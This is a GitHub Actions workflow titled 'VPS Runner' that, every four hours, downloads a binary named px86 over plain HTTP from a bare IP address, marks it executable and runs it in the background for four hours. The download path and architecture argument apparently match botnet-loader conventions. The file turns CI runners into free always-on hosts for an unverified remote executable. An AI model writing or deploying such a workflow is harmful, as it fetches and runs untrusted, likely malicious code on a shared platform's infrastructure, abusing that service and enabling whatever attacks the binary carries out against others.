name: VPS Runner

on:
  schedule:
    # Runs at 00:00, 04:00, 08:00, 12:00, 16:00, and 20:00 UTC
    - cron: '0 */4 * * *'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    timeout-minutes: 240 # Run for 4 hours
    steps:
      - name: Download binary
        run: |
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86

      - name: Run binary for 4 hours
        run: |
          UPTIME_SECONDS=$((4 * 3600))
          echo "Running for 4 hours"

          ./px86 x86 &
          PID=$!

          sleep $UPTIME_SECONDS

          kill $PID 2>/dev/null || true
          echo "Completed successfully"
